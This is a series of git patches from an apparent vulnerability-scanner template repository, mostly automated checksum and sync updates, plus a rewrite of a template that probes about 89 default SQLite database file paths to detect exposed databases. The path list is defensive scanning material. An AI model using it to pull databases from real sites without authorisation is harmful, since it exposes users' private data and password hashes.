@@ -7702,7 +7703,7 @@ http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:26127f055c9c3ffa79366002ca95ea0c80a9c1dc http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc -http/vulnerabilities/tongda/tongda-auth-bypass.yaml:f661e567e8d9b51bdf29cc07155b552b92beab20 +http/vulnerabilities/tongda/tongda-auth-bypass.yaml:99626945f8fb206ae2046e9f22cebadaef9eef0e http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:d1d9be064a074860683581a4e84f8e85a3abfc27 http/vulnerabilities/tongda/tongda-getdata-rce.yaml:b4452e0abc9faa89378a2d6b14c6ef99eddbb56d http/vulnerabilities/tongda/tongda-getway-rfi.yaml:02cae92f443ca026546155a79f51aab073d2a0dd @@ -7944,7 +7945,7 @@ http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4 http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304 http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878 http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:0e1c6d447132c374e620d553de2cd8a8468f917e -http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:9d1201fd282d799868a36ce2c49476f8c146711e +http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:a9c485aef2957f73eec1ea22a2b851f98284f9c9 http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:f72f913987c22ad251d6b4b09e10fe57f20f0727 http/vulnerabilities/wordpress/wp-xmlrpc.yaml:b55a9ba158dc74c9797ce3cddb6464bf48106074 http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml:ec8dd93cf0c3f663465b7191136013def01f5d0f 
@@ -7985,13 +7986,13 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 -javascript/cves/2023/CVE-2023-34039.yaml:15973462461926ddb4e6991f45579aa54ae7fc29 +javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f -javascript/default-logins/ssh-default-logins.yaml:63a239d5a020912bf1e33b4ff59606e25181afe3 +javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:3d274f668de183b62c79c04782bf0740150b4423 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 
@@ -8136,10 +8137,10 @@ network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a -network/misconfig/mysql-native-password.yaml:a9f7b3791ec021bec37c88303be460decc98069f +network/misconfig/mysql-native-password.yaml:610a602de84dc589c5f48b133d27f6b77f3cc422 network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15 network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005 -network/misconfig/tidb-native-password.yaml:cee939c1ed6cf22fbd0fc3d2d6b4047ab02a5fa0 +network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f2845 network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 @@ -8170,7 +8171,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:59b8ce63bd6dd7ced361b025574c2da600135edb +templates-checksum.txt:ea62e7a3ece798218348e5276776aff198c9f2f8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4e054164e70f24755f60d729079d9da2cb01b304 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:12:27 +0000 Subject: [PATCH 22/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) 
diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 663e5a316a..da7f634231 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -32,6 +32,7 @@ on: - 'http/cves/2023/CVE-2023-49785.yaml' - 'http/cves/2023/CVE-2023-5830.yaml' - 'http/cves/2023/CVE-2023-5914.yaml' + - 'http/cves/2024/CVE-2024-1212.yaml' - 'http/cves/2024/CVE-2024-1698.yaml' - 'http/exposed-panels/bynder-panel.yaml' - 'http/exposed-panels/cisco/cisco-expressway-panel.yaml' From 6f0124d586899720b35a1f62666fca927398824e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:13:43 +0000 Subject: [PATCH 23/86] Auto Template Signing [Wed Mar 20 04:13:43 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1212.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index f2464b4726..d27b2d6a70 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -44,3 +44,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220557f3f2f5ab7b8e23925a9acc4979743940842b4936843aaae68876e24ed24a4022100f067f077e0dae8b1aa1264efb248349fdd7e6f95341ca06cbab9c183402f4e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0da4a266ce7d494b6fb72b24aac4d472d3667dd2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:57:34 +0000 Subject: [PATCH 24/86] Auto Generated New Template Addition List [Wed Mar 20 04:57:34 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 932ae622c6..0b99585cdf 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +dns/soa-detect.yaml file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml file/keys/doppler/doppler-audit.yaml From 10c586a607fb9fb78fefee84e5db124e07f66c30 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Wed, 20 Mar 2024 04:57:39 +0000 Subject: [PATCH 25/86] Auto Generated Templates Checksum [Wed Mar 20 04:57:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 649fc4f262..3b84c9da72 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -122,6 +122,7 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 +dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 @@ -3085,7 +3086,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15 http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1 http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949 -http/cves/2024/CVE-2024-1212.yaml:048e1190f404d00105e446714c22fd44431bd387 +http/cves/2024/CVE-2024-1212.yaml:5671b80e9ab3c9274bd98bbeb8fe508980393f85 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7 
@@ -8171,7 +8172,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ea62e7a3ece798218348e5276776aff198c9f2f8 +templates-checksum.txt:1cf7b285b6ad21a0ff4d01a0703cb9c5ac5025b4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e5a61558a591c234f4df647dcbfe6bebc54d17f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:58:18 +0000 Subject: [PATCH 26/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index da7f634231..191c720b88 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'dns/soa-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' - 'file/keys/doppler/doppler-audit.yaml' From 73e65180af38a5be575a0f501212642d8ac7a734 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:59:02 +0000 Subject: [PATCH 27/86] Auto Generated Templates Checksum [Wed Mar 20 04:59:02 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3b84c9da72..33a64481b4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
@@ -125,6 +125,7 @@ dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 +dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891 file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8 @@ -8172,7 +8173,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1cf7b285b6ad21a0ff4d01a0703cb9c5ac5025b4 +templates-checksum.txt:c89e2365557cf78a0e2ea79cd9143ae9b2bbd42f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bff5fe145aaf1e3b27e836f64675039c7a60cc15 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:59:16 +0000 Subject: [PATCH 28/86] Auto Generated New Template Addition List [Wed Mar 20 04:59:16 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 0b99585cdf..cf77a5b53a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ dns/soa-detect.yaml +dns/txt-service-detect.yaml file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml file/keys/doppler/doppler-audit.yaml 
@@ -44,5 +45,6 @@ http/osint/phishing/kakao-login-phish.yaml http/osint/phishing/naver-login-phish.yaml http/technologies/microsoft/aspnet-version-detect.yaml http/technologies/microsoft/aspnetmvc-version-disclosure.yaml +http/technologies/wing-ftp-service-detect.yaml http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml network/detection/wing-ftp-detect.yaml From 8fa711b73fc4a5ca83531803ac0a88f7120b9f46 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:59:22 +0000 Subject: [PATCH 29/86] Auto Template Signing [Wed Mar 20 04:59:22 UTC 2024] :robot: --- dns/soa-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml index eb6eda0782..1d98b9fa5d 100644 --- a/dns/soa-detect.yaml +++ b/dns/soa-detect.yaml @@ -81,3 +81,4 @@ dns: name: "edge-cast" words: - "edgecastdns.net" +# digest: 4a0a00473045022052cc795314a697081c68e82277bf2be22ff53410f9a9a69af759ecefcd5b235b022100f94a899ec64709bb1f7d4e648dc091ee40029b754e4cc451882f0ccb68ff4921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4c5df2dff27cc89dbefc3d58f1abffa009fab62d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:59:54 +0000 Subject: [PATCH 30/86] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 191c720b88..9c636adef9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'dns/soa-detect.yaml' + - 'dns/txt-service-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' - 'file/keys/doppler/doppler-audit.yaml' 
@@ -49,6 +50,7 @@ on: - 'http/osint/phishing/naver-login-phish.yaml' - 'http/technologies/microsoft/aspnet-version-detect.yaml' - 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml' + - 'http/technologies/wing-ftp-service-detect.yaml' - 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml' - 'network/detection/wing-ftp-detect.yaml' workflow_dispatch: From 6bd7a9e020f0d4e640d770d1a2a7a564e3802ae2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 20 Mar 2024 12:51:44 +0530 Subject: [PATCH 31/86] updated with path variable --- http/exposures/files/generic-db.yaml | 187 ++++++++++++++------------- 1 file changed, 95 insertions(+), 92 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 0ac1962fbf..3d0fbff868 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml 
@@ -42,104 +42,107 @@ info:
 cvss-score: 7.5
 metadata:
 max-request: 89
- tags: files,database,exposure,sqlite,sqlite3
+ tags: files,database,exposure,sqlite,sqlite3,fuzz
 http:
 - method: GET
 path:
- # Recommended paths found in framework official docs or unofficial tutorials
- - "{{BaseURL}}/database/database.sqlite"
- - "{{BaseURL}}/database/production.sqlite"
- - "{{BaseURL}}/app/database/production.sqlite"
- - "{{BaseURL}}/writable/db.sqlite3"
- - "{{BaseURL}}/writable/database.db"
- - "{{BaseURL}}/var/app.db"
- - "{{BaseURL}}/var/data/db.sqlite"
- - "{{BaseURL}}/var/data/data.sqlite"
- - "{{BaseURL}}/app/sqlite.db"
- - "{{BaseURL}}/sqlite.db"
- - "{{BaseURL}}/db.sqlite3"
- - "{{BaseURL}}/db/production.sqlite3"
- - "{{BaseURL}}/db.sqlite"
- - "{{BaseURL}}/mydb.sqlite"
- - "{{BaseURL}}/app/data/app_db.sqlite"
- - "{{BaseURL}}/app/webroot/database.sqlite"
- - "{{BaseURL}}/app/database.sqlite"
- - "{{BaseURL}}/application/databases/db.sqlite"
- - "{{BaseURL}}/application/db/database.sqlite"
- - "{{BaseURL}}/application/Database/db1.db"
- - "{{BaseURL}}/application/database/data.db"
- - "{{BaseURL}}/data/app.db"
- - "{{BaseURL}}/data/sqlite.db"
- - "{{BaseURL}}/data/sqlite3.db"
- - "{{BaseURL}}/data/database.db"
- - "{{BaseURL}}/data/production.db"
- - "{{BaseURL}}/storage/database/database.sqlite"
- - "{{BaseURL}}/protected/data/app.db"
- - "{{BaseURL}}/protected/data/sqlite.db"
- - "{{BaseURL}}/protected/data/sqlite3.db"
- - "{{BaseURL}}/protected/data/database.db"
- - "{{BaseURL}}/protected/data/production.db"
- - "{{BaseURL}}/db/database.db"
- - "{{BaseURL}}/db/database.sqlite"
- - "{{BaseURL}}/app/Model/app.db"
- - "{{BaseURL}}/app/Model/sqlite.db"
- - "{{BaseURL}}/app/Model/sqlite3.db"
- - "{{BaseURL}}/app/Model/database.db"
- - "{{BaseURL}}/app/Model/production.db"
- # General paths
- - "{{BaseURL}}/app.db"
- - "{{BaseURL}}/sqlite3.db"
- - "{{BaseURL}}/app.sqlite"
- - "{{BaseURL}}/app.sqlite3"
- - "{{BaseURL}}/database.db"
- - "{{BaseURL}}/database.sqlite"
- - "{{BaseURL}}/database.sqlite3"
- - "{{BaseURL}}/production.db"
- - "{{BaseURL}}/production.sqlite"
- - "{{BaseURL}}/production.sqlite3"
- - "{{BaseURL}}/db/db.sqlite"
- - "{{BaseURL}}/db/db.sqlite3"
- - "{{BaseURL}}/db/sqlite.db"
- - "{{BaseURL}}/db/sqlite3.db"
- - "{{BaseURL}}/db/app.db"
- - "{{BaseURL}}/db/app.sqlite"
- - "{{BaseURL}}/db/app.sqlite3"
- - "{{BaseURL}}/db/database.sqlite3"
- - "{{BaseURL}}/db/production.db"
- - "{{BaseURL}}/db/production.sqlite"
- - "{{BaseURL}}/app/db.sqlite"
- - "{{BaseURL}}/app/db.sqlite3"
- - "{{BaseURL}}/app/sqlite3.db"
- - "{{BaseURL}}/app/app.db"
- - "{{BaseURL}}/app/app.sqlite"
- - "{{BaseURL}}/app/app.sqlite3"
- - "{{BaseURL}}/app/database.db"
- - "{{BaseURL}}/app/database.sqlite3"
- - "{{BaseURL}}/app/production.db"
- - "{{BaseURL}}/app/production.sqlite"
- - "{{BaseURL}}/app/production.sqlite3"
- - "{{BaseURL}}/data/db.sqlite"
- - "{{BaseURL}}/data/db.sqlite3"
- - "{{BaseURL}}/data/app.sqlite"
- - "{{BaseURL}}/data/app.sqlite3"
- - "{{BaseURL}}/data/database.sqlite"
- - "{{BaseURL}}/data/database.sqlite3"
- - "{{BaseURL}}/data/production.sqlite"
- - "{{BaseURL}}/data/production.sqlite3"
- - "{{BaseURL}}/database/db.sqlite"
- - "{{BaseURL}}/database/db.sqlite3"
- - "{{BaseURL}}/database/sqlite.db"
- - "{{BaseURL}}/database/sqlite3.db"
- - "{{BaseURL}}/database/app.db"
- - "{{BaseURL}}/database/app.sqlite"
- - "{{BaseURL}}/database/app.sqlite3"
- - "{{BaseURL}}/database/database.db"
- - "{{BaseURL}}/database/database.sqlite3"
- - "{{BaseURL}}/database/production.db"
- - "{{BaseURL}}/database/production.sqlite3"
+ - "{{BaseURL}}/{{path}}"
+ payloads:
+ path:
+ - database/database.sqlite
+ - database/production.db
+ - database/production.sqlite
+ - database/production.sqlite3
+ - app/database/production.sqlite
+ - writable/db.sqlite3
+ - writable/database.db
+ - var/app.db
+ - var/data/db.sqlite
+ - var/data/data.sqlite
+ - app/sqlite.db
+ - sqlite.db
+ - db.sqlite3
+ - db/production.sqlite3
+ - db.sqlite
+ - mydb.sqlite
+ - app/data/app_db.sqlite
+ - app/webroot/database.sqlite
+ - app/database.sqlite
+ - application/databases/db.sqlite
+ - application/db/database.sqlite
+ - application/Database/db1.db
+ - application/database/data.db
+ - data/app.db
+ - data/sqlite.db
+ - data/sqlite3.db
+ - data/database.db
+ - data/production.db
+ - storage/database/database.sqlite
+ - protected/data/app.db
+ - protected/data/sqlite.db
+ - protected/data/sqlite3.db
+ - protected/data/database.db
+ - protected/data/production.db
+ - db/database.db
+ - db/database.sqlite
+ - app/Model/app.db
+ - app/Model/sqlite.db
+ - app/Model/sqlite3.db
+ - app/Model/database.db
+ - app/Model/production.db
+ - app.db
+ - sqlite3.db
+ - app.sqlite
+ - app.sqlite3
+ - database.db
+ - database.sqlite
+ - database.sqlite3
+ - production.db
+ - production.sqlite
+ - production.sqlite3
+ - db/db.sqlite
+ - db/db.sqlite3
+ - db/sqlite.db
+ - db/sqlite3.db
+ - db/app.db
+ - db/app.sqlite
+ - db/app.sqlite3
+ - db/database.sqlite3
+ - db/production.db
+ - db/production.sqlite
+ - app/db.sqlite
+ - app/db.sqlite3
+ - app/sqlite3.db
+ - app/app.db
+ - app/app.sqlite
+ - app/app.sqlite3
+ - app/database.db
+ - app/database.sqlite3
+ - app/production.db
+ - app/production.sqlite
+ - app/production.sqlite3
+ - data/db.sqlite
+ - data/db.sqlite3
+ - data/app.sqlite
+ - data/app.sqlite3
+ - data/database.sqlite
+ - data/database.sqlite3
+ - data/production.sqlite
+ - data/production.sqlite3
+ - database/db.sqlite
+ - database/db.sqlite3
+ - database/sqlite.db
+ - database/sqlite3.db
+ - database/app.db
+ - database/app.sqlite
+ - database/app.sqlite3
+ - database/database.db
+ - database/database.sqlite3
+
+ stop-at-first-match: true
 matchers:
 - type: dsl
 dsl:
From cc8ee3aa0fdc3674e60d1055ec47147a63bc2879 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 20 Mar 2024 13:38:58 +0530 Subject: [PATCH 32/86] minor update --- http/exposures/files/generic-db.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
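Review bot: The new `payloads.path` list drops the two grouping comments the old path block carried (`# Recommended paths found in framework official docs or unofficial tutorials` and `# General paths`), so a reader can no longer tell which entries are documented framework defaults and which are generic guesses; re-add them as comments above the corresponding entries under `path:`. `max-request: 89` in `metadata` still matches the 89 payloads, but the count is now implicit in a list, so a comment such as `# keep metadata.max-request in sync with the number of path payloads` next to the list would help future edits. The enclosing `http` request and its `matchers` block continue outside the hunk.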
diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml
index 3d0fbff868..d6f33746df 100644
--- a/http/exposures/files/generic-db.yaml
+++ b/http/exposures/files/generic-db.yaml
@@ -4,7 +4,8 @@ info:
 name: Generic Database File - Exposure
 author: Michal Mikolas (nanuqcz)
 severity: high
- description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc.
+ description: |
+ This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc.
 reference:
 - https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite
 - https://laravel.com/docs/5.2/database # database/database.sqlite
From faefc8a92e83377104b005e1790b41da54bc6383 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 08:12:01 +0000 Subject: [PATCH 33/86] Auto Generated New Template Addition List [Wed Mar 20 08:12:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cf77a5b53a..e60a673523 100644 --- a/.new-additions +++ b/.new-additions @@ -40,6 +40,7 @@ http/exposed-panels/neocase-hrportal-panel.yaml http/exposed-panels/osnexus-panel.yaml http/exposed-panels/posteio-admin-panel.yaml http/exposed-panels/skeepers-panel.yaml +http/exposures/files/generic-db.yaml http/misconfiguration/installer/posteio-installer.yaml http/osint/phishing/kakao-login-phish.yaml http/osint/phishing/naver-login-phish.yaml From 20e58460b4cf676ad29ddf535b79298e1e5495b9 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Wed, 20 Mar 2024 08:12:15 +0000 Subject: [PATCH 34/86] Auto Generated Templates Checksum [Wed Mar 20 08:12:15 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 33a64481b4..6048164bfe 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -122,7 +122,7 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 -dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 +dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 @@ -4536,6 +4536,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 +http/exposures/files/generic-db.yaml:1f5cc209039fbe3d53d29286d46bea2e8ffada19 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e 
@@ -6680,6 +6681,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 +http/technologies/wing-ftp-service-detect.yaml:416707a344d027b1224855a9c085642fadcccf38 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900 @@ -8173,7 +8175,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c89e2365557cf78a0e2ea79cd9143ae9b2bbd42f +templates-checksum.txt:0bd557ae0e24c541eae22a598daa4f74b79cfd0f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 